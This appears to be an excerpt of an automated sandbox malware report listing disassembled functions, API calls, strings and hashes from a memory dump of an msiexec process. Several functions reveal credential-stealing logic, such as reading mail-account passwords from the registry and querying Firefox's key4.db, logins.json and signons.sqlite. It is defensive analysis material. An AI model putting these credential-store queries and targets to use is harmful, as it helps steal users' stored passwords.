                                                                                                                                                • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                                                • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                                                                • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                                                Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                                                • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                                                • GetDC.USER32 ref: 004104E2
                                                                                                                                                • strlen.MSVCRT ref: 00410522
                                                                                                                                                • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                                                • sprintf.MSVCRT ref: 00410640
                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                                                • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                • String ID: %s:$EDIT$STATIC
                                                                                                                                                • API String ID: 1703216249-3046471546
                                                                                                                                                • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                                                • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                                                • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                                                • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                                                Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004024F5
                                                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,?,?,?,67CD7B60,?,00000000), ref: 00402533
                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscpy$QueryValuememset
                                                                                                                                                • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                • API String ID: 168965057-606283353
                                                                                                                                                • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                                                                                • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                                                • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                                                                                • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                                                Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                                                • memset.MSVCRT ref: 0040128E
                                                                                                                                                • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2998058495-0
                                                                                                                                                • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                                                                • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                                                • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                                                                • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                                                Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                                                                • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                                                                • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                                                                • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                                                                • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                                                                • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                • API String ID: 231171946-2189169393
                                                                                                                                                • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                                                • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                                                Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                • API String ID: 633282248-1996832678
                                                                                                                                                • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                                                • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                                                • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                                                • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                                                Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00406782
                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                                                • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                                                                                • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                                                • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                                                • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                                                                                • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                                                • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                                                • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                                                • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                                                • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                                                                Strings
                                                                                                                                                • , xrefs: 00406834
                                                                                                                                                • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                                                • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                                • key4.db, xrefs: 00406756
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                                • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                • API String ID: 3614188050-3983245814
                                                                                                                                                • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                                                                • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                                                                Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: sprintf$memset$_mbscpy
                                                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                • API String ID: 3402215030-3842416460
                                                                                                                                                • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                                                • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                                                • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                                                • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                                                                Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                                                  • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                                                                  • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                                                  • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                                                  • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                  • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                                                • strlen.MSVCRT ref: 0040F139
                                                                                                                                                • strlen.MSVCRT ref: 0040F147
                                                                                                                                                • memset.MSVCRT ref: 0040F187
                                                                                                                                                • strlen.MSVCRT ref: 0040F196
                                                                                                                                                • strlen.MSVCRT ref: 0040F1A4
                                                                                                                                                • memset.MSVCRT ref: 0040F1EA
                                                                                                                                                • strlen.MSVCRT ref: 0040F1F9
                                                                                                                                                • strlen.MSVCRT ref: 0040F207
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                                                • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                                                • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                                                • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                • API String ID: 2003275452-3138536805
                                                                                                                                                • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                                                • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                                                                • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                                                • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                                                                Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040C3F7
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                                                • strrchr.MSVCRT ref: 0040C417
                                                                                                                                                • _mbscat.MSVCRT ref: 0040C431
                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                                                • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                                                • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                                                • API String ID: 1012775001-1343505058
                                                                                                                                                • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                                                                • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                                                                • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                                                                • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                                                                Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00444612
                                                                                                                                                  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                • strlen.MSVCRT ref: 0044462E
                                                                                                                                                • memset.MSVCRT ref: 00444668
                                                                                                                                                • memset.MSVCRT ref: 0044467C
                                                                                                                                                • memset.MSVCRT ref: 00444690
                                                                                                                                                • memset.MSVCRT ref: 004446B6
                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                  • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                                                • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                • String ID: salu
                                                                                                                                                • API String ID: 3691931180-4177317985
                                                                                                                                                • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                                                                • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                                                                • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                                                                • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                                                                Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                • API String ID: 2449869053-232097475
                                                                                                                                                • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                                                                • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                                                                Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • sprintf.MSVCRT ref: 0040957B
                                                                                                                                                • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                                                  • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                                                  • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                                                  • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                                                  • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                                                • sprintf.MSVCRT ref: 004095EB
                                                                                                                                                • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                                                • memset.MSVCRT ref: 0040961C
                                                                                                                                                • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                                                • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                • API String ID: 3259144588-3822380221
                                                                                                                                                • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                                                                • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                                                                • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
